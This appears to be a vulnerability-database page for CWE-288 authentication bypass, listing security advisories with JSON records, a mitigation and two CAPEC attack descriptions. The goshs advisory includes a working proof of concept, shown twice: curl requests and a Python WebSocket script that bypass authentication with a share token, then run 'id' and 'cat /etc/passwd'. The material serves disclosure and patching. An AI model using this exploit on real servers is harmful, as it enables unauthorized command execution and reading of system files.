CWE-288
AllowedAuthentication Bypass Using an Alternate Path or Channel
Abstraction: Base · Status: Incomplete
The product requires authentication, but the product has an alternate path or channel that does not require authentication.
1072 vulnerabilities reference this CWE, most recent first.
GHSA-JGFX-74G2-9R6G
Vulnerability from github – Published: 2026-04-01 20:58 – Updated: 2026-04-06 17:32Summary
When using the Share Token it is possible to bypass the limited selected file download with all the gosh functionalities, including code exec.
Details
The BasicAuthMiddleware checks for a ?token= parameter before checking credentials. If the token exists in SharedLinks, the request passes through with no auth check at all. The handler then processes all query parameters — including ?ws (WebSocket) which has higher priority than ?token.
// middleware.go:22-30 — token check runs FIRST
token := r.URL.Query().Get("token")
if token != "" {
_, ok := fs.SharedLinks[token]
if ok {
next.ServeHTTP(w, r) // Full auth bypass
return
}
}
// ... normal auth checks never reached
A share token is designed for single-file, time-limited downloads. But the middleware bypass grants access to everything — directory listing, file deletion, clipboard, WebSocket, and CLI command execution.
1. Create a webroot:
mkdir -p /tmp/goshs-webroot
echo "shareable file" > /tmp/goshs-webroot/shareable.txt
2. Start goshs with auth + TLS + CLI mode:
/tmp/goshs-test -d /tmp/goshs-webroot -b 'admin:password' -s -ss -c -p 8000
CLI mode requires auth (
-b) and TLS (-s -ss). This is the documented usage — not a weakened config.
3. Verify authentication is required:
curl -sk https://localhost:8000/
Not authorized
4. As a legitimate user, create a share link:
curl -sk -u admin:password 'https://localhost:8000/shareable.txt?share'
Response:
{"urls":["https://127.0.0.1:8000/shareable.txt?token=gMP-w0hXRs-Q-FEZku63kA"]}
Save the token value (e.g., gMP-w0hXRs-Q-FEZku63kA).
5. Prove the token bypasses auth for WebSocket:
# Without token → 401 (blocked)
curl -sk -o /dev/null -w "%{http_code}" \
-H "Connection: Upgrade" -H "Upgrade: websocket" \
-H "Sec-WebSocket-Version: 13" -H "Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==" \
'https://localhost:8000/?ws'
# 401
# With token → 101 Switching Protocols (auth bypassed!)
curl -sk -o /dev/null -w "%{http_code}" \
-H "Connection: Upgrade" -H "Upgrade: websocket" \
-H "Sec-WebSocket-Version: 13" -H "Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==" \
'https://localhost:8000/?ws&token=gMP-w0hXRs-Q-FEZku63kA'
# 101
For a Full PoC, you can run the python file attached below, it will run id and cat /etc/passwd.
PoC
import json, ssl, websocket
TOKEN = "gMP-w0hXRs-Q-FEZku63kA" # ← replace with your token
ws = websocket.create_connection(
f"wss://localhost:8000/?ws&token={TOKEN}",
sslopt={"cert_reqs": ssl.CERT_NONE},
)
print("[+] Connected WITHOUT credentials!")
# Execute 'id'
ws.send('{"type":"command","Content":"id"}')
import time; time.sleep(1)
resp = json.loads(ws.recv())
print(f"Output: {resp['content']}")
# uid=501(youruser) gid=20(staff) ...
# Execute 'cat /etc/passwd'
ws.send('{"type":"command","Content":"cat /etc/passwd"}')
time.sleep(1)
resp = json.loads(ws.recv())
print(f"Output: {resp['content']}")
ws.close()
A patch is available at https://github.com/patrickhener/goshs/releases/tag/v2.0.0-beta.2.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/patrickhener/goshs"
},
"ranges": [
{
"events": [
{
"introduced": "1.1.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-34581"
],
"database_specific": {
"cwe_ids": [
"CWE-288"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-01T20:58:48Z",
"nvd_published_at": "2026-04-02T19:21:32Z",
"severity": "HIGH"
},
"details": "### Summary\nWhen using the `Share Token` it is possible to bypass the limited selected file download with all the gosh functionalities, including code exec.\n\n### Details\n\nThe `BasicAuthMiddleware` checks for a `?token=` parameter **before** checking credentials. If the token exists in `SharedLinks`, the request passes through with **no auth check at all**. The handler then processes all query parameters \u2014 including `?ws` (WebSocket) which has higher priority than `?token`.\n\n```go\n// middleware.go:22-30 \u2014 token check runs FIRST\ntoken := r.URL.Query().Get(\"token\")\nif token != \"\" {\n _, ok := fs.SharedLinks[token]\n if ok {\n next.ServeHTTP(w, r) // Full auth bypass\n return\n }\n}\n// ... normal auth checks never reached\n```\n\nA share token is designed for **single-file, time-limited downloads**. But the middleware bypass grants access to everything \u2014 directory listing, file deletion, clipboard, WebSocket, and CLI command execution.\n\n\n**1. Create a webroot:**\n\n```bash\nmkdir -p /tmp/goshs-webroot\necho \"shareable file\" \u003e /tmp/goshs-webroot/shareable.txt\n```\n\n**2. Start goshs with auth + TLS + CLI mode:**\n\n```bash\n/tmp/goshs-test -d /tmp/goshs-webroot -b \u0027admin:password\u0027 -s -ss -c -p 8000\n```\n\n\u003e CLI mode requires auth (`-b`) and TLS (`-s -ss`). This is the documented usage \u2014 not a weakened config.\n\n**3. Verify authentication is required:**\n\n```bash\ncurl -sk https://localhost:8000/\nNot authorized\n```\n\n**4. As a legitimate user, create a share link:**\n\n```bash\ncurl -sk -u admin:password \u0027https://localhost:8000/shareable.txt?share\u0027\n```\n\nResponse:\n```json\n{\"urls\":[\"https://127.0.0.1:8000/shareable.txt?token=gMP-w0hXRs-Q-FEZku63kA\"]}\n```\n\nSave the token value (e.g., `gMP-w0hXRs-Q-FEZku63kA`).\n\n**5. Prove the token bypasses auth for WebSocket:**\n\n```bash\n# Without token \u2192 401 (blocked)\ncurl -sk -o /dev/null -w \"%{http_code}\" \\\n -H \"Connection: Upgrade\" -H \"Upgrade: websocket\" \\\n -H \"Sec-WebSocket-Version: 13\" -H \"Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==\" \\\n \u0027https://localhost:8000/?ws\u0027\n# 401\n\n# With token \u2192 101 Switching Protocols (auth bypassed!)\ncurl -sk -o /dev/null -w \"%{http_code}\" \\\n -H \"Connection: Upgrade\" -H \"Upgrade: websocket\" \\\n -H \"Sec-WebSocket-Version: 13\" -H \"Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==\" \\\n \u0027https://localhost:8000/?ws\u0026token=gMP-w0hXRs-Q-FEZku63kA\u0027\n# 101\n```\n\nFor a Full PoC, you can run the python file attached below, it will run `id` and `cat /etc/passwd`.\n\n\n\n\n### PoC\n\n``` python\nimport json, ssl, websocket\n\nTOKEN = \"gMP-w0hXRs-Q-FEZku63kA\" # \u2190 replace with your token\n\nws = websocket.create_connection(\n f\"wss://localhost:8000/?ws\u0026token={TOKEN}\",\n sslopt={\"cert_reqs\": ssl.CERT_NONE},\n)\nprint(\"[+] Connected WITHOUT credentials!\")\n\n# Execute \u0027id\u0027\nws.send(\u0027{\"type\":\"command\",\"Content\":\"id\"}\u0027)\nimport time; time.sleep(1)\nresp = json.loads(ws.recv())\nprint(f\"Output: {resp[\u0027content\u0027]}\")\n# uid=501(youruser) gid=20(staff) ...\n\n# Execute \u0027cat /etc/passwd\u0027\nws.send(\u0027{\"type\":\"command\",\"Content\":\"cat /etc/passwd\"}\u0027)\ntime.sleep(1)\nresp = json.loads(ws.recv())\nprint(f\"Output: {resp[\u0027content\u0027]}\")\n\nws.close()\n```\nA patch is available at https://github.com/patrickhener/goshs/releases/tag/v2.0.0-beta.2.",
"id": "GHSA-jgfx-74g2-9r6g",
"modified": "2026-04-06T17:32:15Z",
"published": "2026-04-01T20:58:48Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/patrickhener/goshs/security/advisories/GHSA-jgfx-74g2-9r6g"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34581"
},
{
"type": "WEB",
"url": "https://github.com/patrickhener/goshs/commit/6fb224ed15c2ccc0c61a5ebe22f2401eb06e9216"
},
{
"type": "PACKAGE",
"url": "https://github.com/patrickhener/goshs"
},
{
"type": "WEB",
"url": "https://github.com/patrickhener/goshs/releases/tag/v2.0.0-beta.2"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "goshs has Auth Bypass via Share Token"
}
GHSA-JGMV-VP3C-XPJ5
Vulnerability from github – Published: 2024-10-20 09:30 – Updated: 2026-04-01 18:32Authentication Bypass Using an Alternate Path or Channel vulnerability in Vivek Tamrakar WP REST API FNS allows Authentication Bypass.This issue affects WP REST API FNS: from n/a through 1.0.0.
{
"affected": [],
"aliases": [
"CVE-2024-49328"
],
"database_specific": {
"cwe_ids": [
"CWE-288",
"CWE-306"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-10-20T08:15:03Z",
"severity": "CRITICAL"
},
"details": "Authentication Bypass Using an Alternate Path or Channel vulnerability in Vivek Tamrakar WP REST API FNS allows Authentication Bypass.This issue affects WP REST API FNS: from n/a through 1.0.0.",
"id": "GHSA-jgmv-vp3c-xpj5",
"modified": "2026-04-01T18:32:06Z",
"published": "2024-10-20T09:30:44Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-49328"
},
{
"type": "WEB",
"url": "https://patchstack.com/database/Wordpress/Plugin/rest-api-fns/vulnerability/wordpress-wp-rest-api-fns-plugin-plugin-1-0-0-account-takeover-vulnerability?_s_id=cve"
},
{
"type": "WEB",
"url": "https://patchstack.com/database/vulnerability/rest-api-fns/wordpress-wp-rest-api-fns-plugin-plugin-1-0-0-account-takeover-vulnerability?_s_id=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-JH73-2GQF-9G2H
Vulnerability from github – Published: 2023-06-07 03:30 – Updated: 2024-04-04 04:38The Better Search plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.5.2. This makes it possible for unauthenticated attackers to import settings via forged request granted they can trick a site administrator into performing an action such as clicking on a link.
{
"affected": [],
"aliases": [
"CVE-2021-4373"
],
"database_specific": {
"cwe_ids": [
"CWE-288",
"CWE-352"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-06-07T02:15:15Z",
"severity": "MODERATE"
},
"details": "The Better Search plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.5.2. This makes it possible for unauthenticated attackers to import settings via forged request granted they can trick a site administrator into performing an action such as clicking on a link.",
"id": "GHSA-jh73-2gqf-9g2h",
"modified": "2024-04-04T04:38:50Z",
"published": "2023-06-07T03:30:23Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-4373"
},
{
"type": "WEB",
"url": "https://blog.nintechnet.com/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/changeset/2473344"
},
{
"type": "WEB",
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/cfc6c595-dad2-4abc-8187-ed72355273b8?source=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-JMQ5-MQX2-5F5C
Vulnerability from github – Published: 2025-03-12 12:30 – Updated: 2025-03-12 12:30The Workreap plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 3.2.5. This is due to the plugin not properly validating a user's identity prior to (1) performing a social auto-login or (2) updating their profile details (e.g. password). This makes it possible for unauthenticated attackers to (1) login as an arbitrary user if their email address is known or (2) change an arbitrary user's password, including administrators, and leverage that to gain access to their account. NOTE: This vulnerability was partially fixed in version 3.2.5.
{
"affected": [],
"aliases": [
"CVE-2024-13446"
],
"database_specific": {
"cwe_ids": [
"CWE-288"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-03-12T10:15:14Z",
"severity": "CRITICAL"
},
"details": "The Workreap plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 3.2.5. This is due to the plugin not properly validating a user\u0027s identity prior to (1) performing a social auto-login or (2) updating their profile details (e.g. password). This makes it possible for unauthenticated attackers to (1) login as an arbitrary user if their email address is known or (2) change an arbitrary user\u0027s password, including administrators, and leverage that to gain access to their account. NOTE: This vulnerability was partially fixed in version 3.2.5.",
"id": "GHSA-jmq5-mqx2-5f5c",
"modified": "2025-03-12T12:30:57Z",
"published": "2025-03-12T12:30:57Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-13446"
},
{
"type": "WEB",
"url": "https://themeforest.net/item/workreap-freelance-marketplace-wordpress-theme/23712454"
},
{
"type": "WEB",
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/78c1308b-0849-4235-b2d6-0b1750a5614f?source=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-JMR6-WH5F-876Q
Vulnerability from github – Published: 2025-03-14 06:30 – Updated: 2025-03-14 06:30The WP JobHunt plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 7.1. This is due to the plugin not properly verifying a user's identity prior to authenticating them through the cs_parse_request() function. This makes it possible for unauthenticated attackers to to log in to any user's account, including administrators.
{
"affected": [],
"aliases": [
"CVE-2024-11286"
],
"database_specific": {
"cwe_ids": [
"CWE-288"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-03-14T05:15:40Z",
"severity": "CRITICAL"
},
"details": "The WP JobHunt plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 7.1. This is due to the plugin not properly verifying a user\u0027s identity prior to authenticating them through the cs_parse_request() function. This makes it possible for unauthenticated attackers to to log in to any user\u0027s account, including administrators.",
"id": "GHSA-jmr6-wh5f-876q",
"modified": "2025-03-14T06:30:42Z",
"published": "2025-03-14T06:30:42Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-11286"
},
{
"type": "WEB",
"url": "https://themeforest.net/item/jobcareer-job-board-responsive-wordpress-theme/14221636"
},
{
"type": "WEB",
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/91754c4d-a0d0-4d35-a70a-446d2bdf6c73?source=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-JMWH-PJXM-P3CM
Vulnerability from github – Published: 2026-06-15 21:30 – Updated: 2026-06-15 21:30Unauthenticated Broken Authentication in Really Simple SSL <= 9.5.10 versions.
{
"affected": [],
"aliases": [
"CVE-2026-48970"
],
"database_specific": {
"cwe_ids": [
"CWE-288"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-06-15T21:17:18Z",
"severity": "HIGH"
},
"details": "Unauthenticated Broken Authentication in Really Simple SSL \u003c= 9.5.10 versions.",
"id": "GHSA-jmwh-pjxm-p3cm",
"modified": "2026-06-15T21:30:49Z",
"published": "2026-06-15T21:30:49Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-48970"
},
{
"type": "WEB",
"url": "https://patchstack.com/database/wordpress/plugin/really-simple-ssl/vulnerability/wordpress-really-simple-ssl-plugin-9-5-10-broken-authentication-vulnerability?_s_id=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-JQ5G-XXG4-VW6H
Vulnerability from github – Published: 2022-05-24 19:12 – Updated: 2022-07-03 00:00Delta Electronics DIAEnergie Version 1.7.5 and prior may allow an attacker to add a new administrative user without being authenticated or authorized, which may allow the attacker to log in and use the device with administrative privileges.
{
"affected": [],
"aliases": [
"CVE-2021-32967"
],
"database_specific": {
"cwe_ids": [
"CWE-287",
"CWE-288"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-08-30T18:15:00Z",
"severity": "CRITICAL"
},
"details": "Delta Electronics DIAEnergie Version 1.7.5 and prior may allow an attacker to add a new administrative user without being authenticated or authorized, which may allow the attacker to log in and use the device with administrative privileges.",
"id": "GHSA-jq5g-xxg4-vw6h",
"modified": "2022-07-03T00:00:24Z",
"published": "2022-05-24T19:12:28Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-32967"
},
{
"type": "WEB",
"url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-238-03"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-JQJ3-FH4V-X7HJ
Vulnerability from github – Published: 2025-03-13 18:32 – Updated: 2025-03-13 18:32Optigo Networks Visual BACnet Capture Tool and Optigo Visual Networks Capture Tool version 3.1.2rc11 contain an exposed web management service that could allow an attacker to bypass authentication measures and gain controls over utilities within the products.
{
"affected": [],
"aliases": [
"CVE-2025-2080"
],
"database_specific": {
"cwe_ids": [
"CWE-288"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-03-13T17:15:38Z",
"severity": "CRITICAL"
},
"details": "Optigo Networks Visual BACnet Capture Tool and Optigo Visual Networks Capture Tool version 3.1.2rc11 contain an exposed web management service that could allow an attacker to bypass authentication measures and gain controls over utilities within the products.",
"id": "GHSA-jqj3-fh4v-x7hj",
"modified": "2025-03-13T18:32:23Z",
"published": "2025-03-13T18:32:23Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-2080"
},
{
"type": "WEB",
"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-070-02"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-JQMQ-FPWV-P925
Vulnerability from github – Published: 2025-10-30 00:31 – Updated: 2025-10-30 17:06Authentication Bypass Using an Alternate Path or Channel vulnerability in Drupal Simple OAuth (OAuth2) & OpenID Connect allows Authentication Bypass. This issue affects Simple OAuth (OAuth2) & OpenID Connect: from 6.0.0 before 6.0.7.
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "drupal/simple_oauth"
},
"ranges": [
{
"events": [
{
"introduced": "6.0.0"
},
{
"fixed": "6.0.7"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-12466"
],
"database_specific": {
"cwe_ids": [
"CWE-288"
],
"github_reviewed": true,
"github_reviewed_at": "2025-10-30T17:06:19Z",
"nvd_published_at": "2025-10-30T00:15:34Z",
"severity": "HIGH"
},
"details": "Authentication Bypass Using an Alternate Path or Channel vulnerability in Drupal Simple OAuth (OAuth2) \u0026 OpenID Connect allows Authentication Bypass. This issue affects Simple OAuth (OAuth2) \u0026 OpenID Connect: from 6.0.0 before 6.0.7.",
"id": "GHSA-jqmq-fpwv-p925",
"modified": "2025-10-30T17:06:19Z",
"published": "2025-10-30T00:31:04Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12466"
},
{
"type": "WEB",
"url": "https://www.drupal.org/sa-contrib-2025-114"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Drupal Simple OAuth (OAuth2) \u0026 OpenID Connect allows Authentication Bypass"
}
GHSA-JRMW-X68C-2F58
Vulnerability from github – Published: 2025-02-27 09:31 – Updated: 2026-04-08 21:33The Login Me Now plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 1.7.2. This is due to insecure authentication based on an arbitrary transient name in the 'AutoLogin::listen()' function. This makes it possible for unauthenticated attackers to log in an existing user on the site, even an administrator. Note: this vulnerability requires using a transient name and value from another software, so the plugin is not inherently vulnerable on it's own.
{
"affected": [],
"aliases": [
"CVE-2025-1717"
],
"database_specific": {
"cwe_ids": [
"CWE-288",
"CWE-306"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-02-27T08:15:31Z",
"severity": "HIGH"
},
"details": "The Login Me Now plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 1.7.2. This is due to insecure authentication based on an arbitrary transient name in the \u0027AutoLogin::listen()\u0027 function. This makes it possible for unauthenticated attackers to log in an existing user on the site, even an administrator. Note: this vulnerability requires using a transient name and value from another software, so the plugin is not inherently vulnerable on it\u0027s own.",
"id": "GHSA-jrmw-x68c-2f58",
"modified": "2026-04-08T21:33:03Z",
"published": "2025-02-27T09:31:45Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1717"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/browser/login-me-now/tags/1.7.2/app/Logins/BrowserTokenLogin/AutoLogin.php#L24"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/changeset/3247924/login-me-now"
},
{
"type": "WEB",
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/fc689622-50d6-47c4-a5f6-0314b1a207c9?source=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
Mitigation
Funnel all access through a single choke point to simplify how users can access a resource. For every access, perform a check to determine if the user has permissions to access the resource.
CAPEC-127: Directory Indexing
An adversary crafts a request to a target that results in the target listing/indexing the content of a directory as output. One common method of triggering directory contents as output is to construct a request containing a path that terminates in a directory name rather than a file name since many applications are configured to provide a list of the directory's contents when such a request is received. An adversary can use this to explore the directory tree on a target as well as learn the names of files. This can often end up revealing test files, backup files, temporary files, hidden files, configuration files, user accounts, script contents, as well as naming conventions, all of which can be used by an attacker to mount additional attacks.
CAPEC-665: Exploitation of Thunderbolt Protection Flaws
An adversary leverages a firmware weakness within the Thunderbolt protocol, on a computing device to manipulate Thunderbolt controller firmware in order to exploit vulnerabilities in the implementation of authorization and verification schemes within Thunderbolt protection mechanisms. Upon gaining physical access to a target device, the adversary conducts high-level firmware manipulation of the victim Thunderbolt controller SPI (Serial Peripheral Interface) flash, through the use of a SPI Programing device and an external Thunderbolt device, typically as the target device is booting up. If successful, this allows the adversary to modify memory, subvert authentication mechanisms, spoof identities and content, and extract data and memory from the target device. Currently 7 major vulnerabilities exist within Thunderbolt protocol with 9 attack vectors as noted in the Execution Flow.